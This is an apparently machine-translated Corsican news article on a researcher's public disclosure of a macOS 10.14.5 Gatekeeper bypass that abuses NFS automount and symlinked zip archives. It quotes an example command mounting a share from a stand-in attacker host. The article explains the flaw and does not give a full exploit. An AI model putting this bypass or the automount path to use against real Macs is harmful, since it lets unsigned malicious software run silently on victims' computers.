Hè faciule d'installà una app maliciosa in un Mac. Apple ùn hà micca riparatu l'errore ancu dopu à trè mesi

U 27 d'ottobre, 5

L'investigatore di sicurezza Filippo Cavallarin hà publicatu un avvirtimentu annantu à u bug in macOS 10.14.5 in u so blog. Questu cunsiste in a pussibilità di scaccià cumplettamente e misure di sicurezza di Gatekeeper. Sicondu Cavallarin, hà indicatu l'errore à Apple digià in u frivaru di questu annu, ma a cumpagnia ùn hà micca riparatu in l'ultima aghjurnazione.

Gatekeeper hè statu sviluppatu da Apple è incorporatu in u so sistema upirativu desktop per a prima volta in 2012. Hè un miccanisimu chì impedisce à una applicazione di eseguisce senza a cunniscenza è l'accunsentu di l'utilizatore. Dopu avè scaricatu una app, Gatekeeper verifica automaticamente u so codice per vede se u software hè firmatu bè da Apple.

In u so blog post, Cavallarin dichjara chì Gatekeeper, per difettu, cunsidereghja l'almacenamiento esternu è l'azzioni di a rete per esse locu sicuri. Ogni applicazione chì reside in questi miri pò dunque esse lanciata automaticamente senza avè da passà per u cuntrollu Gatekeeper. Hè sta funzione chì pò esse sfruttata per lancià un software maliziusu senza a cunniscenza di l'utilizatore.

Un aspettu chì permette l'accessu micca autorizatu hè a funzione di automount, chì permette à l'utilizatori di muntà automaticamente una parte di a rete solu per specificà una strada chì principia cù "/net/". Per esempiu, Cavallarin cita u percorsu "ls /net/evil-attacker.com/sharedfolder/" chì pò causà à u sistema upirativu per carricà u cuntenutu di un cartulare "sharedfolder" in un locu remotu chì pò esse potenzialmente maliziusu.

Pudete guardà a manera chì a minaccia funziona in u video:

Un altru fattore hè u fattu chì se un archiviu zip chì cuntene un ligame simbolicu specificu chì porta à a funzione automount hè spartutu, ùn serà micca verificatu da Gatekeeper. In questu modu, a vittima pò facilmente scaricà l'archiviu maliziusu è unzip, chì permette à l'attaccante di eseguisce virtualmente qualsiasi software in u Mac senza a cunniscenza di l'utilizatore. U Finder, chì oculta certe estensioni per difettu, hà ancu a so parte di sta vulnerabilità.

Cavallarin dichjara in u so blog chì Apple hà attiratu l'attenzione à a vulnerabilità di u sistema operatore macOS u 22 di ferraghju di questu annu. Ma à a mità di maghju, Apple hà cessatu di cumunicà cù Cavallarin, cusì Cavallarin hà decisu di fà tuttu u publicu.

Surghjente: FCVL

Temi: almacenamentu, automaticamente, MacOS, Video, Impostazioni, funzione, utilizatore, Applicà, Apple

Discussione di l'articulu

U vostru nome

U vostru cumentu

Cumpiendu i dati sopra, ricunnosce chì a cumpagnia TEXT FACTORY s.r.o., sede legale in Brno, Durďákova 336/29, Černá Pole, codice postale: 613 00, numeru ID: 06157831, registrata à a Corte Regionale in Brno, sezione. , inserisce 100399, tratterà i mo dati persunali furniti in u modulu di iscrizzione cumpletu da mè nantu à a basa di l'interessi legittimi di TEXT FACTORY s.r.o. secondu l'articulu 6 paragrafo 1 lettera f) GDPR è per cumpiendu obblighi legali (Articulu 6, paragrafo 1, lettera c) GDPR), per i seguenti scopi: a necessità di assicurà l'autorizazione di i visitatori di i siti web operati da TEXT FACTORY s.r.o. per cuntribuisce attivamente à l'articuli publicati o in discussione. fori e esercitando i diritti di TEXT FACTORY s.r.o. in qualità di amministratore di questi forum di discussione. Più infurmazione nantu à u trattamentu di e dati persunali è i diritti ponu esse truvati in Lezioni nantu à a prutezzione di dati persunali. tuttu u testu

Puderia esse ti interessa

Related